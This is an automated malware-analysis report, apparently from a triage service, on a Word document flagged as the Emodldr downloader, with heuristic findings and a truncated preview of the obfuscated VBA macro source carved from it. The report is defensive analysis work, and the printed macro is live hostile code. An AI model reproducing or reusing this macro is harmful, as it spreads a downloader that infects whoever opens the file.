Verdict: MALICIOUS
Risk Score: 244
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, including an AutoOpen macro and CreateObject calls, which are indicative of malicious intent. The presence of legacy WordBasic and Excel 4.0 macros further supports this. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' suggests it's a known downloader. The VBA script, though obfuscated, likely attempts to download and execute a second-stage payload, aligning with the 'Emodldr' family's typical behavior.
Heuristics (9)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70137 bytes |

SHA-256: 9f8576edc651633bfa901584406da3c9df74a58899b5e3affa0da9c432928854
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 23 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "OoUGIPmH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DzdITkQ"
Function jkQLKTBdibHwj()
On Error Resume Next
Select Case qlYDlA
Case 94482
dHkGj = AuSkOB
RrFtCM = Nivbo
SFisWR = Cos(76926 * CBool(99495))
Case 59539
uHVjwE = 20959
GrOYtT = Fix(18928)
nhnvLJ = Oct(35794)
End Select
PhfspQYcSc = lsqkpT("b@O.NAYDA2AwYAYGA1AAZAgDAyAwYAADAxAgNAIGA2AAZAQDA3AQMAQ7nwY", 5 + 0, 51 + 0)
Select Case NuPZNz
Case 25670
mRLmhj = JXwUw
uLLjn = GMjPlo
SCollJ = Cos(58077 * CBool(68231))
Case 71778
HXBGNi = 45407
oWYTi = Fix(7502)
aSGTDC = Oct(50207)
End Select
Select Case SORmUl
Case 33169
vJfrY = vqbza
DKJOkq = tzPRNQ
KPndc = Cos(97185 * CBool(47382))
Case 60088
krjkS = 79016
EzzisH = Fix(11413)
CiIXW = Oct(61369)
End Select
oTfLzHwz = lsqkpT("hlzZAMGAlBQZAYDAxAwNAQGAjBwYAEDAjBQYAYDA4AQYAEDA4AQYAMGAmBwNAgDAwAgYAYDA3AQOAwHA9AQPAEFACBQUAQDAvBwKAUGAB,8pTv", 6 + 0, 102 + 0)
Select Case RaRtjD
Case 95239
bXYmY = BFKEz
UPmND = kbwqB
rsZIS = Cos(49104 * CBool(17243))
Case 91775
aVGUU = 64851
AYwSWU = Fix(47136)
oEqWT = Oct(42546)
End Select
Select Case UToiKT
Case 12386
QKCbsM = GrwdBp
hMMOq = pzOYzT
cIOdIR = Cos(46283 * CBool(15754))
Case 29610
ZQOdj = 36350
KGkJlc = Fix(36234)
dIwSvi = Oct(54318)
End Select
aGmuzItl = lsqkpT("F9JwAjBwYAgDAiBQOAQDA0AQNAYGAkBgMAADA1AAMAMDAlBQNAYDAwAANAIDAiBQYAYGA5AAZAIDAyAgNAUGA3AgMAcDAxAwMAADA2AQMAMDA0AQNAQcIC", 4 + 0, 111 + 0)
Select Case RNzcS
Case 39291
RCSqmz = TGiQNs
kqjvhf = ZpTrz
zQmpfp = Cos(42373 * CBool(37840))
Case 14212
ljwBp = 85404
iQjpjX = Fix(32985)
locrNw = Oct(98533)
End Select
Select Case BvhBd
Case 24365
wppqlR = LNQrHa
SBWjm = zNvOC
BKNrZZ = Cos(3888 * CBool(34265))
Case 901
CjrWBq = 90079
zAHjj = Fix(88949)
Rqsuk = Oct(89252)
End Select
ojJwHnCiH = lsqkpT("99OTAQZAUDAxAQOAMGAhBwNAEGAlBwYAMDAhBQNAcDA5AQOAUGAlBQMAQDAmBQNAEDA5AQYAgDA3AANAUGA3AAZAUDA2AQYAcDAhBwMAUDAkBQOAQDAiBgNAcSz", 4 + 0, 116 + 0)
Select Case nLPXzW
Case 81001
FIYbz = sQSHTn
CSSbT = IiJWPw
tfGdsY = Cos(33732 * CBool(59233))
Case 89137
KHvVYa = 49485
RHJksw = Fix(93701)
qhjwlJ = Oct(59436)
End Select
Select Case OVDHCm
Case 38026
KqnSkm = bXKzi
SilFt = jNrjk
HKiFt = Cos(17920 * CBool(97742))
Case 46483
vQDhB = 73518
YnQFSO = Fix(92957)
RBJOkY = Oct(37184)
End Select
jbPEnSW = lsqkpT("1U7MAIGAzAgMAUGAwAgMAQGAzAAZAADAlBQYAkDAmBQNAADAzAwMAgDA5AgNAMDAiBgZAIDAiBgNAIGA2AgZAcDAiBAZAQGA2AAMAYGAhBwNAMDAiBQMAUDAhBg36GP", 5 + 0, 120 + 0)
Select Case CKcbm
Case 42191
BAFsWS = YsmHoE
fqtOr = rzknAc
BXYKp = Cos(4470 * CBool(16677))
Case 28404
MVaUk = 56898
bdjPn = Fix(44203)
jNuin = Oct(2964)
End Select
Select Case zllIz
Case 38393
miMcZW = uuhlCz
BdSWn = trJGSQ
fojwJ = Cos(14033 * CBool(74932))
Case 785
mCEAi = 60459
FwrImz = Fix(14420)
mLpzv = Oct(49101)
End Select
uzYYLSqT = lsqkpT("IK3AJAIDAiBAMAADA0AQZA
... (truncated)